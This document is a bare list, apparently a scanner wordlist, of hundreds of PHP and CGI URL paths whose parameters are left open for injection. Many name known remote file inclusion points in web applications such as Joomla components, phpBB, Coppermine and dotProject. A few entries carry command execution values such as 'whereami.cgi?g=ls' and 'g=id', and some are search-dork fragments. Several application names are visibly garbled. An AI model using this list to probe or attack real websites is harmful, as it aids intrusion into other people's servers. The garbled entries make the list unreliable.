main.php?chapter=&#13;
layout.php?chapter=&#13;
layout.php?incl=&#13;
include.php?url=&#13;
base.php?sivu=&#13;
index.php?link=&#13;
sub*.php?cont=&#13;
info.php?oldal=&#13;
general.php?rub=&#13;
default.php?str=&#13;
head.php?ev=&#13;
sub*.php?path=&#13;
view.php?page=&#13;
main.php?j=&#13;
index2.php?basepath=&#13;
gery.php?qry=&#13;
main.php?url=&#13;
default.php?incl=&#13;
show.php?redirect=&#13;
index1.php?pre=&#13;
general.php?base_dir=&#13;
start.php?in=&#13;
show.php?abre=&#13;
index1.php?home=&#13;
home.php?ev=&#13;
index2.php?ki=&#13;
base.php?pag=&#13;
default.php?ir=&#13;
general.php?qry=&#13;
index2.php?home=&#13;
press.php?nivel=&#13;
enter.php?pr=&#13;
blank.php?loader=&#13;
start.php?cmd=&#13;
padrao.php?d=&#13;
sitio.php?recipe=&#13;
principal.php?read=&#13;
standard.php?showpage=&#13;
main.php?pg=&#13;
page.php?panel=&#13;
press.php?addr=&#13;
template.php?s=&#13;
main.php?tipo=&#13;
*inc*.php?ev=&#13;
padrao.php?page=&#13;
show.php?thispage=&#13;
home.php?secao=&#13;
main.php?start=&#13;
enter.php?mid=&#13;
press.php?id=&#13;
main.php?inc=&#13;
index3.php?cmd=&#13;
index.php?pname=&#13;
press.php?subject=&#13;
include.php?sec=&#13;
index3.php?xlink=&#13;
general.php?texto=&#13;
index3.php?go=&#13;
index.php?cmd=&#13;
index3.php?disp=&#13;
index3.php?left=&#13;
sub*.php?middle=&#13;
show.php?modo=&#13;
index1.php?pagina=&#13;
head.php?left=&#13;
enter.php?phpbb_root_path=&#13;
show.php?z=&#13;
start.php?basepath=&#13;
blank.php?strona=&#13;
template.php?y=&#13;
page.php?where=&#13;
layout.php?category=&#13;
index1.php?my=&#13;
principal.php?phpbb_root_path=&#13;
nota.php?channel=&#13;
page.php?choix=&#13;
start.php?xlink=&#13;
home.php?k=&#13;
standard.php?phpbb_root_path=&#13;
principal.php?middlePart=&#13;
mod*.php?m=&#13;
index.php?recipe=&#13;
template.php?path=&#13;
pagina.php?dir=&#13;
sitio.php?abre=&#13;
index1.php?recipe=&#13;
blank.php?page=&#13;
sub*.php?category=&#13;
*inc*.php?body=&#13;
enter.php?middle=&#13;
home.php?path=&#13;
down*.php?pre=&#13;
base.php?w=&#13;
main.php?path=&#13;
nota.php?ir=&#13;
press.php?link=&#13;
gery.php?pollname=&#13;
down*.php?open=&#13;
down*.php?pageweb=&#13;
default.php?eval=&#13;
view.php?showpage=&#13;
show.php?get=&#13;
sitio.php?tipo=&#13;
layout.php?cont=&#13;
default.php?destino=&#13;
padrao.php?seccion=&#13;
down*.php?r=&#13;
main.php?param=&#13;
standard.php?e=&#13;
down*.php?in=&#13;
nota.php?include=&#13;
sitio.php?secao=&#13;
print.php?my=&#13;
general.php?abre=&#13;
general.php?link=&#13;
default.php?id=&#13;
standard.php?panel=&#13;
show.php?channel=&#13;
enter.php?r=&#13;
index3.php?phpbb_root_path=&#13;
gery.php?where=&#13;
head.php?middle=&#13;
sub*.php?load=&#13;
gery.php?sp=&#13;
show.php?chapter=&#13;
sub*.php?b=&#13;
general.php?adresa=&#13;
print.php?goto=&#13;
sub*.php?sp=&#13;
template.php?doshow=&#13;
padrao.php?base_dir=&#13;
index2.php?my=&#13;
include.php?w=&#13;
start.php?op=&#13;
main.php?section=&#13;
view.php?header=&#13;
layout.php?menue=&#13;
head.php?y=&#13;
sub*.php?content=&#13;
show.php?type=&#13;
base.php?id=&#13;
mod*.php?qry=&#13;
default.php?strona=&#13;
sitio.php?chapter=&#13;
gery.php?index=&#13;
nota.php?h=&#13;
page.php?oldal=&#13;
enter.php?panel=&#13;
blank.php?t=&#13;
start.php?pollname=&#13;
sub*.php?module=&#13;
enter.php?thispage=&#13;
mod*.php?index=&#13;
sitio.php?r=&#13;
sub*.php?play=&#13;
index2.php?doshow=&#13;
index2.php?chapter=&#13;
show.php?path=&#13;
gery.php?to=&#13;
info.php?base_dir=&#13;
gery.php?abre=&#13;
gery.php?pag=&#13;
view.php?channel=&#13;
default.php?mod=&#13;
index.php?op=&#13;
general.php?pre=&#13;
padrao.php?type=&#13;
template.php?pag=&#13;
standard.php?pre=&#13;
blank.php?ref=&#13;
down*.php?z=&#13;
general.php?inc=&#13;
home.php?read=&#13;
pagina.php?section=&#13;
default.php?basepath=&#13;
index.php?pre=&#13;
sitio.php?pageweb=&#13;
base.php?seite=&#13;
*inc*.php?j=&#13;
index2.php?filepath=&#13;
file.php?type=&#13;
index1.php?oldal=&#13;
index2.php?second=&#13;
index3.php?sekce=&#13;
info.php?filepath=&#13;
base.php?opcion=&#13;
path.php?category=&#13;
index3.php?start=&#13;
start.php?rub=&#13;
*inc*.php?i=&#13;
blank.php?pre=&#13;
general.php?channel=&#13;
index2.php?OpenPage=&#13;
page.php?section=&#13;
mod*.php?middle=&#13;
index1.php?goFile=&#13;
blank.php?action=&#13;
principal.php?loader=&#13;
sub*.php?op=&#13;
main.php?addr=&#13;
start.php?mid=&#13;
gery.php?secao=&#13;
pagina.php?tipo=&#13;
index.php?w=&#13;
head.php?where=&#13;
principal.php?tipo=&#13;
press.php?loader=&#13;
gery.php?showpage=&#13;
gery.php?go=&#13;
enter.php?start=&#13;
press.php?lang=&#13;
general.php?p=&#13;
index.php?sekce=&#13;
index2.php?get=&#13;
sitio.php?go=&#13;
include.php?cont=&#13;
sub*.php?where=&#13;
index3.php?index=&#13;
path.php?recipe=&#13;
info.php?loader=&#13;
print.php?sp=&#13;
page.php?phpbb_root_path=&#13;
path.php?body=&#13;
principal.php?menue=&#13;
print.php?cont=&#13;
pagina.php?z=&#13;
default.php?mid=&#13;
blank.php?xlink=&#13;
sub*.php?oldal=&#13;
general.php?b=&#13;
include.php?left=&#13;
print.php?sivu=&#13;
press.php?OpenPage=&#13;
default.php?cont=&#13;
general.php?pollname=&#13;
template.php?nivel=&#13;
enter.php?page=&#13;
file.php?middle=&#13;
standard.php?str=&#13;
gery.php?get=&#13;
main.php?v=&#13;
down*.php?subject=&#13;
enter.php?sivu=&#13;
path.php?option=&#13;
index.php?strona=&#13;
index1.php?choix=&#13;
index2.php?f=&#13;
press.php?destino=&#13;
pagina.php?channel=&#13;
principal.php?b=&#13;
home.php?include=&#13;
head.php?numero=&#13;
general.php?ref=&#13;
main.php?dir=&#13;
gery.php?cont=&#13;
principal.php?type=&#13;
file.php?param=&#13;
default.php?secao=&#13;
path.php?pageweb=&#13;
info.php?r=&#13;
base.php?phpbb_root_path=&#13;
main.php?itemnav=&#13;
view.php?pg=&#13;
pagina.php?choix=&#13;
default.php?itemnav=&#13;
index2.php?cmd=&#13;
layout.php?url=&#13;
index.php?path=&#13;
index1.php?second=&#13;
start.php?modo=&#13;
index1.php?get=&#13;
index3.php?my=&#13;
sub*.php?left=&#13;
print.php?inc=&#13;
view.php?type=&#13;
path.php?*[*]*=&#13;
base.php?adresa=&#13;
index3.php?oldal=&#13;
standard.php?body=&#13;
base.php?path=&#13;
principal.php?strona=&#13;
info.php?l=&#13;
template.php?left=&#13;
head.php?loc=&#13;
page.php?ir=&#13;
print.php?path=&#13;
down*.php?path=&#13;
sitio.php?opcion=&#13;
pagina.php?category=&#13;
press.php?menu=&#13;
index2.php?pref=&#13;
sitio.php?incl=&#13;
show.php?ki=&#13;
index3.php?x=&#13;
page.php?strona=&#13;
*inc*.php?open=&#13;
index3.php?secao=&#13;
standard.php?*[*]*=&#13;
template.php?basepath=&#13;
standard.php?goFile=&#13;
index2.php?ir=&#13;
file.php?modo=&#13;
gery.php?itemnav=&#13;
main.php?oldal=&#13;
down*.php?showpage=&#13;
start.php?destino=&#13;
blank.php?rub=&#13;
path.php?ir=&#13;
layout.php?var=&#13;
index1.php?texto=&#13;
start.php?pg=&#13;
index1.php?showpage=&#13;
info.php?go=&#13;
path.php?load=&#13;
index3.php?abre=&#13;
blank.php?where=&#13;
info.php?start=&#13;
page.php?secao=&#13;
nota.php?pag=&#13;
nota.php?second=&#13;
index2.php?to=&#13;
standard.php?name=&#13;
start.php?strona=&#13;
mod*.php?numero=&#13;
press.php?home=&#13;
info.php?z=&#13;
mod*.php?path=&#13;
blank.php?base_dir=&#13;
base.php?texto=&#13;
nota.php?secc=&#13;
index.php?tipo=&#13;
index.php?goto=&#13;
print.php?pag=&#13;
view.php?secao=&#13;
general.php?strona=&#13;
show.php?my=&#13;
page.php?e=&#13;
padrao.php?index=&#13;
gery.php?thispage=&#13;
start.php?base_dir=&#13;
default.php?tipo=&#13;
gery.php?panel=&#13;
standard.php?ev=&#13;
standard.php?destino=&#13;
general.php?middle=&#13;
main.php?basepath=&#13;
standard.php?q=&#13;
index1.php?tipo=&#13;
mod*.php?choix=&#13;
template.php?ir=&#13;
show.php?adresa=&#13;
general.php?mid=&#13;
index3.php?adresa=&#13;
pagina.php?sec=&#13;
template.php?secao=&#13;
home.php?w=&#13;
general.php?content=&#13;
sub*.php?recipe=&#13;
main.php?category=&#13;
enter.php?viewpage=&#13;
main.php?ir=&#13;
show.php?pageweb=&#13;
principal.php?ir=&#13;
default.php?pageweb=&#13;
index.php?oldal=&#13;
head.php?d=&#13;
gery.php?mid=&#13;
index.php?type=&#13;
standard.php?j=&#13;
show.php?oldal=&#13;
enter.php?link=&#13;
enter.php?content=&#13;
blank.php?filepath=&#13;
standard.php?channel=&#13;
base.php?*[*]*=&#13;
info.php?incl=&#13;
down*.php?include=&#13;
press.php?modo=&#13;
file.php?choix=&#13;
press.php?type=&#13;
blank.php?goto=&#13;
index3.php?showpage=&#13;
principal.php?subject=&#13;
start.php?chapter=&#13;
show.php?r=&#13;
pagina.php?thispage=&#13;
general.php?chapter=&#13;
page.php?base_dir=&#13;
page.php?qry=&#13;
show.php?incl=&#13;
page.php?*[*]*=&#13;
main.php?h=&#13;
file.php?seccion=&#13;
default.php?pre=&#13;
principal.php?index=&#13;
principal.php?inc=&#13;
home.php?z=&#13;
pagina.php?in=&#13;
show.php?play=&#13;
nota.php?subject=&#13;
default.php?secc=&#13;
default.php?loader=&#13;
padrao.php?var=&#13;
mod*.php?b=&#13;
default.php?showpage=&#13;
press.php?channel=&#13;
pagina.php?ev=&#13;
sitio.php?name=&#13;
page.php?option=&#13;
press.php?mid=&#13;
down*.php?corpo=&#13;
view.php?get=&#13;
print.php?thispage=&#13;
principal.php?home=&#13;
show.php?param=&#13;
standard.php?sivu=&#13;
index3.php?panel=&#13;
include.php?play=&#13;
path.php?cmd=&#13;
file.php?sp=&#13;
template.php?section=&#13;
view.php?str=&#13;
blank.php?left=&#13;
nota.php?lang=&#13;
path.php?sivu=&#13;
main.php?e=&#13;
default.php?ref=&#13;
start.php?seite=&#13;
default.php?inc=&#13;
print.php?disp=&#13;
home.php?h=&#13;
principal.php?loc=&#13;
index3.php?sp=&#13;
gery.php?var=&#13;
sub*.php?base_dir=&#13;
path.php?middle=&#13;
pagina.php?str=&#13;
base.php?play=&#13;
base.php?v=&#13;
sitio.php?sivu=&#13;
main.php?r=&#13;
file.php?nivel=&#13;
start.php?sivu=&#13;
template.php?c=&#13;
general.php?second=&#13;
sub*.php?mod=&#13;
home.php?loc=&#13;
head.php?corpo=&#13;
standard.php?op=&#13;
index2.php?inc=&#13;
info.php?pref=&#13;
base.php?basepath=&#13;
print.php?basepath=&#13;
*inc*.php?m=&#13;
base.php?home=&#13;
layout.php?strona=&#13;
padrao.php?url=&#13;
sitio.php?oldal=&#13;
pagina.php?read=&#13;
index1.php?go=&#13;
standard.php?s=&#13;
page.php?eval=&#13;
index.php?j=&#13;
pagina.php?pr=&#13;
start.php?secao=&#13;
template.php?*[*]*=&#13;
nota.php?get=&#13;
index3.php?link=&#13;
home.php?e=&#13;
gery.php?name=&#13;
nota.php?eval=&#13;
sub*.php?abre=&#13;
index2.php?load=&#13;
principal.php?in=&#13;
view.php?load=&#13;
mod*.php?action=&#13;
default.php?p=&#13;
head.php?c=&#13;
template.php?viewpage=&#13;
view.php?mid=&#13;
padrao.php?addr=&#13;
view.php?go=&#13;
file.php?basepath=&#13;
home.php?pre=&#13;
include.php?goFile=&#13;
layout.php?play=&#13;
index1.php?subject=&#13;
info.php?middlePart=&#13;
down*.php?pg=&#13;
sub*.php?body=&#13;
index.php?option=&#13;
sub*.php?chapter=&#13;
default.php?t=&#13;
head.php?opcion=&#13;
nota.php?panel=&#13;
sitio.php?left=&#13;
show.php?include=&#13;
pagina.php?start=&#13;
head.php?choix=&#13;
index3.php?tipo=&#13;
index3.php?choix=&#13;
down*.php?channel=&#13;
base.php?pa=&#13;
nota.php?sekce=&#13;
show.php?l=&#13;
show.php?index=&#13;
blank.php?url=&#13;
start.php?thispage=&#13;
nota.php?play=&#13;
show.php?second=&#13;
enter.php?include=&#13;
principal.php?middle=&#13;
main.php?where=&#13;
padrao.php?link=&#13;
path.php?strona=&#13;
index3.php?read=&#13;
mod*.php?module=&#13;
standard.php?viewpage=&#13;
standard.php?pr=&#13;
*inc*.php?showpage=&#13;
pagina.php?ref=&#13;
path.php?pname=&#13;
padrao.php?mid=&#13;
info.php?eval=&#13;
include.php?path=&#13;
page.php?subject=&#13;
sub*.php?qry=&#13;
head.php?module=&#13;
nota.php?opcion=&#13;
head.php?abre=&#13;
base.php?str=&#13;
home.php?body=&#13;
gery.php?module=&#13;
head.php?sivu=&#13;
page.php?inc=&#13;
pagina.php?header=&#13;
mod*.php?v=&#13;
home.php?doshow=&#13;
padrao.php?n=&#13;
index1.php?chapter=&#13;
padrao.php?basepath=&#13;
index.php?r=&#13;
index3.php?seccion=&#13;
sitio.php?mid=&#13;
index.php?where=&#13;
general.php?type=&#13;
pagina.php?goto=&#13;
page.php?pa=&#13;
default.php?menue=&#13;
main.php?goto=&#13;
index1.php?abre=&#13;
info.php?seccion=&#13;
index2.php?pa=&#13;
layout.php?pageweb=&#13;
nota.php?disp=&#13;
index1.php?body=&#13;
default.php?nivel=&#13;
show.php?header=&#13;
down*.php?pag=&#13;
start.php?tipo=&#13;
standard.php?w=&#13;
index.php?open=&#13;
blank.php?menu=&#13;
general.php?nivel=&#13;
padrao.php?nivel=&#13;
*inc*.php?addr=&#13;
index.php?var=&#13;
home.php?redirect=&#13;
*inc*.php?link=&#13;
*inc*.php?incl=&#13;
padrao.php?corpo=&#13;
down*.php?url=&#13;
enter.php?goto=&#13;
down*.php?addr=&#13;
sub*.php?j=&#13;
principal.php?f=&#13;
sub*.php?menue=&#13;
index2.php?section=&#13;
general.php?my=&#13;
head.php?loader=&#13;
general.php?goto=&#13;
include.php?dir=&#13;
start.php?header=&#13;
blank.php?in=&#13;
base.php?name=&#13;
nota.php?goFile=&#13;
head.php?base_dir=&#13;
mod*.php?recipe=&#13;
press.php?pr=&#13;
padrao.php?*[*]*=&#13;
layout.php?opcion=&#13;
print.php?rub=&#13;
index.php?pr=&#13;
general.php?seite=&#13;
pagina.php?numero=&#13;
*inc*.php?pg=&#13;
nota.php?rub=&#13;
view.php?seite=&#13;
pagina.php?recipe=&#13;
index.php?pref=&#13;
page.php?action=&#13;
page.php?ev=&#13;
show.php?ir=&#13;
head.php?index=&#13;
mod*.php?pname=&#13;
view.php?ir=&#13;
*inc*.php?start=&#13;
principal.php?rub=&#13;
principal.php?corpo=&#13;
padrao.php?middle=&#13;
base.php?pname=&#13;
template.php?header=&#13;
view.php?sp=&#13;
main.php?name=&#13;
nota.php?m=&#13;
blank.php?open=&#13;
head.php?dir=&#13;
page.php?pname=&#13;
*inc*.php?k=&#13;
index.php?pollname=&#13;
head.php?oldal=&#13;
index1.php?str=&#13;
template.php?choix=&#13;
down*.php?pollname=&#13;
page.php?recipe=&#13;
template.php?corpo=&#13;
nota.php?sec=&#13;
info.php?*[*]*=&#13;
sub*.php?*[*]*=&#13;
page.php?q=&#13;
index1.php?type=&#13;
gery.php?y=&#13;
standard.php?lang=&#13;
gery.php?page=&#13;
index.php?action=&#13;
press.php?pname=&#13;
down*.php?v=&#13;
index3.php?second=&#13;
show.php?recipe=&#13;
main.php?pre=&#13;
file.php?numero=&#13;
print.php?str=&#13;
standard.php?link=&#13;
nota.php?OpenPage=&#13;
view.php?pollname=&#13;
print.php?l=&#13;
index.php?go=&#13;
standard.php?numero=&#13;
view.php?pr=&#13;
down*.php?read=&#13;
down*.php?action=&#13;
index1.php?OpenPage=&#13;
principal.php?left=&#13;
mod*.php?start=&#13;
file.php?body=&#13;
gery.php?pg=&#13;
blank.php?qry=&#13;
base.php?eval=&#13;
default.php?left=&#13;
gery.php?param=&#13;
blank.php?pa=&#13;
nota.php?b=&#13;
path.php?loader=&#13;
start.php?o=&#13;
include.php?include=&#13;
nota.php?corpo=&#13;
enter.php?second=&#13;
sub*.php?pname=&#13;
mod*.php?pageweb=&#13;
principal.php?addr=&#13;
standard.php?action=&#13;
template.php?lang=&#13;
include.php?basepath=&#13;
sub*.php?ir=&#13;
down*.php?nivel=&#13;
path.php?opcion=&#13;
print.php?category=&#13;
print.php?menu=&#13;
layout.php?secao=&#13;
template.php?param=&#13;
standard.php?ref=&#13;
base.php?include=&#13;
blank.php?body=&#13;
path.php?pref=&#13;
print.php?g=&#13;
padrao.php?subject=&#13;
nota.php?modo=&#13;
index3.php?loader=&#13;
template.php?seite=&#13;
general.php?pageweb=&#13;
index2.php?param=&#13;
path.php?nivel=&#13;
page.php?pref=&#13;
press.php?pref=&#13;
enter.php?ev=&#13;
standard.php?middle=&#13;
index2.php?recipe=&#13;
blank.php?dir=&#13;
home.php?pageweb=&#13;
view.php?panel=&#13;
down*.php?home=&#13;
head.php?ir=&#13;
mod*.php?ir=&#13;
show.php?pagina=&#13;
default.php?base_dir=&#13;
show.php?loader=&#13;
path.php?mid=&#13;
blank.php?abre=&#13;
down*.php?choix=&#13;
info.php?opcion=&#13;
page.php?loader=&#13;
principal.php?oldal=&#13;
index1.php?load=&#13;
home.php?content=&#13;
pagina.php?sekce=&#13;
file.php?n=&#13;
include.php?redirect=&#13;
print.php?itemnav=&#13;
enter.php?index=&#13;
print.php?middle=&#13;
sitio.php?goFile=&#13;
head.php?include=&#13;
enter.php?e=&#13;
index.php?play=&#13;
enter.php?id=&#13;
view.php?mod=&#13;
show.php?nivel=&#13;
file.php?channel=&#13;
layout.php?choix=&#13;
info.php?body=&#13;
include.php?go=&#13;
index3.php?nivel=&#13;
sub*.php?include=&#13;
path.php?numero=&#13;
principal.php?header=&#13;
main.php?opcion=&#13;
enter.php?s=&#13;
sub*.php?pre=&#13;
include.php?index=&#13;
gery.php?pageweb=&#13;
padrao.php?path=&#13;
info.php?url=&#13;
press.php?ev=&#13;
index1.php?pg=&#13;
print.php?in=&#13;
general.php?modo=&#13;
head.php?ki=&#13;
press.php?my=&#13;
index1.php?pollname=&#13;
principal.php?to=&#13;
default.php?play=&#13;
page.php?g=&#13;
nota.php?pg=&#13;
blank.php?destino=&#13;
blank.php?z=&#13;
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=&#13;
module_db.php?pivot_path= module_db.php?pivot_path="&#13;
/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir="&#13;
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=&#13;
com_extended_registration&#13;
smarty_config.php?root_dir= "smarty"&#13;
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr&#13;
send_reminders.php?includedir= "send_reminders.php?includedir="&#13;
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery&#13;
inc/functions.inc.php?config[ppa_root_path]= "Index – Albums" index.php&#13;
/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg"&#13;
[Script Path]/admin/index.php?o= admin/index.php";&#13;
/admin/index.php?o= admin/index.php";&#13;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine&#13;
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar&#13;
admin/doeditconfig.php?thispath=../includes&amp;config[path]= "admin"&#13;
/components/com_simpleboard/image_upload.php?sbp= com_simpleboard"&#13;
components/com_simpleboard/image_upload.php?sbp= com_simpleboard"&#13;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine&#13;
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=&#13;
zentrack/index.php?configFile=&#13;
inst/index.php?lng=../../include/main.inc&amp;G_PATH=&#13;
pivot/modules/module_db.php?pivot_path=&#13;
include/write.php?dir=&#13;
includes/header.php?systempath=&#13;
becommunity/community/index.php?pageurl=&#13;
agendax/addevent.inc.php?agendax_path=&#13;
myPHPCalendar/admin.php?cal_dir=&#13;
yabbse/Sources/Packages.php?sourcedir=&#13;
zboard/zboard.php&#13;
path_of_cpcommerce/_functions.php?prefix&#13;
dotproject/modules/projects/addedit.php?root_dir=&#13;
dotproject/modules/projects/view.php?root_dir=&#13;
dotproject/modules/projects/vw_files.php?root_dir=&#13;
dotproject/modules/tasks/addedit.php?root_dir=&#13;
dotproject/modules/tasks/viewgantt.php?root_dir=&#13;
My_eGery/public/displayCategory.php?basepath=&#13;
modules/My_eGery/public/displayCategory.php?basepath=&#13;
modules/4nAlbum/public/displayCategory.php?basepath=&#13;
modules/coppermine/themes/default/theme.php?THEME_DIR=&#13;
modules/agendax/addevent.inc.php?agendax_path=&#13;
modules/xoopsgery/upgrade_album.php?GERY_BASEDIR=&#13;
modules/xgery/upgrade_album.php?GERY_BASEDIR=&#13;
modules/coppermine/include/init.inc.php?CPG_M_DIR=&#13;
shoutbox/expanded.php?conf=&#13;
library/editor/editor.php?root=&#13;
library/lib.php?root=&#13;
e107/e107_handlers/secure_img_render.php?p=&#13;
main.php?x=&#13;
*default.php?page=&#13;
*default.php?body=&#13;
*index.php?url=&#13;
*index.php?arquivo=&#13;
index.php?include=&#13;
index.php?visualizar=&#13;
index.php?pagina=&#13;
index.php?page=&#13;
index.php?p=&#13;
index.php?cont=&#13;
index.php?x=&#13;
index.php?cat=&#13;
index.php?site=&#13;
index.php?configFile=&#13;
index.php?do=&#13;
index2.php?x=&#13;
Index.php?id=&#13;
template.php?pagina&#13;
inc/step_one_tables.php?server_inc=&#13;
GradeMap/index.php?page=&#13;
admin.php?cal_dir=&#13;
path_of_cpcommerce/_functions.php?prefix=&#13;
contacts.php?cal_dir=&#13;
convert-date.php?cal_dir=&#13;
album_portal.php?phpbb_root_path=&#13;
mainfile.php?MAIN_PATH=&#13;
dotproject/modules/files/index_table.php?root_dir=&#13;
gery/init.php?HTTP_POST_VARS=&#13;
pm/lib.inc.php?pm_path=&#13;
ideabox/include.php?gorumDir=&#13;
cgi-bin/index.cgi?page=&#13;
cgi-bin/awstats.pl?update=1&amp;logfile=&#13;
cgi-bin/awstats/awstats.pl?configdir&#13;
cgi-bin/ikonboard.cgi&#13;
cgi-bin/acart/acart.pl?&amp;page=&#13;
cgi-bin/quikstore.cgi?category=&#13;
cgi-bin/ubb/ubb.cgi?g=&#13;
cgi-bin/hinsts.pl?&#13;
cgi-bin/bp/bp-lib.pl?g=&#13;
ccbill/whereami.cgi?g=ls&#13;
cgi-bin/telnet.cgi&#13;
cgi-bin/1/cmd.cgi&#13;
calendar.pl?command=login&amp;fromTemplate=&#13;
encore/forumcgi/display.cgi?preftemp=temp&amp;page=anonymous&amp;file=&#13;
events.cgi?t=&#13;
powerup.cgi?a=latest&amp;t=&#13;
lc.cgi?a=&#13;
news.cgi?a=114&amp;t=&#13;
biznews.cgi?a=33&amp;t=&#13;
jobs.cgi?a=9&amp;t=&#13;
articles.cgi?a=34&amp;t=&#13;
events.cgi?a=155&amp;t=&#13;
latinbitz.cgi?t=&#13;
newsdesk.cgi?t=&#13;
media.cgi?a=11&amp;t=&#13;
reporter.cgi?t=&#13;
news.cgi?t=&#13;
newsupdate.cgi?a=latest&amp;t=&#13;
deportes.cgi?a=latest&amp;t=&#13;
news.cgi?a=latest&amp;t=&#13;
whereami.cgi?g=id&#13;
auktion.pl?menue=&#13;
i-m/i-m.cgi?p=&#13;
vote.pl?action=show&amp;id=&#13;
shop.pl/page=&#13;
newsdesk.cgi?a=latest&amp;t=&#13;
fileseek.cgi?head=&amp;foot=&#13;
cgi-bin/probe.cgi?olddat=&#13;
emsgb/easymsgb.pl?print=&#13;
app/webeditor/login.cgi?username=&amp;command=simple&amp;do=edit&amp;password=&amp;file=&#13;
csv_db/csv_db.cgi?fil e=file.extention&#13;
cgi-bin/jammail.pl?job=showoldmail&amp;mail=&#13;
cgi-bin/bbs/read.cgi?file=&#13;
support_page.cgi?file_name=&#13;
index.php?include=&#13;
index.php?open=&#13;
index.php?visualizar=&#13;
main.php?x=&#13;
main.php?page=&#13;
index.php?meio.php=&#13;
index.php?page=&#13;
index.php?action=&#13;
index5.php?configFile=&#13;
index5.php?page=&#13;
index5.php?content=&#13;
index5.php?x=&#13;
index5.php?open=&#13;
index5.php?m=&#13;
index5.php?site=&#13;
index5.php?cat=&#13;
index.php?d=&#13;
index.php?a=&#13;
index.php?b=&#13;
index.php?c=&#13;
index.php?e=&#13;
index.php?f=&#13;
index.php?g=&#13;
index.php?h=&#13;
index.php?i=&#13;
index.php?j=&#13;
index.php?k=&#13;
index.php?l=&#13;
index.php?m=&#13;
index.php?n=&#13;
index.php?o=&#13;
index.php?p=&#13;
index.php?q=&#13;
index.php?r=&#13;
index.php?s=&#13;
index.php?t=&#13;
index.php?u=&#13;
index.php?v=&#13;
index.php?x=&#13;
index.php?y=&#13;
index.php?z=&#13;
index.php?loc=&#13;
index.php?seite=&#13;
index2.php?d=&#13;
index2.php?a=&#13;
index.php?ir=&#13;
index.php?secao=&#13;
index2.php?b=&#13;
index2.php?c=&#13;
index2.php?e=&#13;
index2.php?f=&#13;
index2.php?g=&#13;
index2.php?h=&#13;
index2.php?i=&#13;
index2.php?j=&#13;
index2.php?k=&#13;
index2.php?l=&#13;
index2.php?m=&#13;
index2.php?n=&#13;
index2.php?o=&#13;
index2.php?p=&#13;
index2.php?q=&#13;
index2.php?r=&#13;
index2.php?s=&#13;
index2.php?t=&#13;
index2.php?u=&#13;
index2.php?v=&#13;
index2.php?x=&#13;
index2.php?y=&#13;
index2.php?z=&#13;
index5.php?inc=&#13;
index5.php?pg=&#13;
index5.php?lv1=&#13;
index.php?sub=&#13;
index.php?sub2=&#13;
index.php?pg=&#13;
index.php?lv1=&#13;
index.php?directfile=&#13;
index.php?funcion=&#13;
index.php?ll=&#13;
index.php?lnk=&#13;
index5.php?main=&#13;
index5.php?include=&#13;
index5.php?root=&#13;
index5.php?pagina=&#13;
index.php?theme=&#13;
index.php?acao=&#13;
index5.php?cont=&#13;
index5.php?pag=&#13;
index5.php?p=&#13;
index5.php?lang=&#13;
index5.php?language=&#13;
template.php?pagina=&#13;
llindex.php?sub=&#13;
index2.php?pg=&#13;
index2.php?lv1=&#13;
index2.php?sub=&#13;
index2.php?directfile=&#13;
index2.php?funcion=&#13;
index2.php?sub2=&#13;
index2.php?ll=&#13;
index2.php?lnk=&#13;
index5.php?body=&#13;
index5.php?visualizar=&#13;
index5.php?do=&#13;
index2.php?theme=&#13;
index2.php?acao=&#13;
index2:php?aa=&#13;
index3:php?aa=&#13;
index.php?server=&#13;
index.php?cal=&#13;
index.php?prefix=&#13;
index.php?root_PATH=&#13;
index.php?path=&#13;
index.php?gorumdir=&#13;
index2.php?cont=&#13;
index2.php?server=&#13;
index2.php?cal=&#13;
index2.php?prefix=&#13;
index2.php?root_PATH=&#13;
index2.php?path= AKI&#13;
exibir.php?abre=&#13;
exibir.php?page=&#13;
exibir.php?get=&#13;
exibir.php?p=&#13;
exibir.php?lang=&#13;
index2.php?gorumdir=&#13;
index2.php?pag=&#13;
index2.php?lang=&#13;
index2.php?language=&#13;
index2.php?content=&#13;
index.php?middle=&#13;
step_one_tables.php?server_inc=&#13;
grademade/index.php?page=&#13;
phpshop/index.php?base_dir=&#13;
admin.php?cal_dir=&#13;
_functions.php?prefix=&#13;
contacts.php?cal_dir=&#13;
convert-date.php?cal_dir=&#13;
album_portal.php?phpbb_root_path=&#13;
mainfile.php?MAIN_PATH=&#13;
index_table.php?root_dir=&#13;
affich.php?base=&#13;
init.php?HTTP_POST_VARS=&#13;
lib.inc.php?pm_path=&#13;
include.php?gorumDir=&#13;
start_lobby.php?CONFIG[MWCHAT_Libs]=&#13;
index.php?configFile=&#13;
module_db.php?pivot_path=&#13;
index.php?lng=../../include/main.inc&amp;G_PATH=&#13;
initdb.php?absolute_path=&#13;
step_one.php?server_inc=&#13;
pipe.php?HCL_path=&#13;
write.php?dir=&#13;
new-visitor.inc.php?lvc_include_dir=&#13;
header.php?systempath=&#13;
theme.php?THEME_DIR=&#13;
index.php?pageurl=&#13;
expanded.php?conf=&#13;
addevent.inc.php?agendax_path=&#13;
Packages.php?sourcedir=&#13;
_functions.php?prefix&#13;
addedit.php?root_dir=&#13;
view.php?root_dir=&#13;
vw_files.php?root_dir=&#13;
viewgantt.php?root_dir=&#13;
displayCategory.php?basepath=&#13;
default/theme.php?THEME_DIR=&#13;
upgrade_album.php?GERY_BASEDIR=&#13;
init.inc.php?CPG_M_DIR=&#13;
mod_mainmenu.php?mosConfig_absolute_path=&#13;
editor.php?root=&#13;
lib.php?root=&#13;
secure_img_render.php?p=&#13;
default.php?page=&#13;
arquivo.php?data=&#13;
word.php?id=&#13;
mod.php?mod=&#13;
index.php?plugin=&#13;
sendpage.php?page=&#13;
index.php?hl=&#13;
modules.php?op=&#13;
index.php?templateid=&#13;
article.php?sid=&#13;
.php?my="&#13;
.php?a="&#13;
.php?f="&#13;
.php?z="&#13;
.php?zo="&#13;
.php?la="&#13;
.php?perm="&#13;
.php?item_id="&#13;
.php?f_content="&#13;
.php?from="&#13;
.php?mid="&#13;
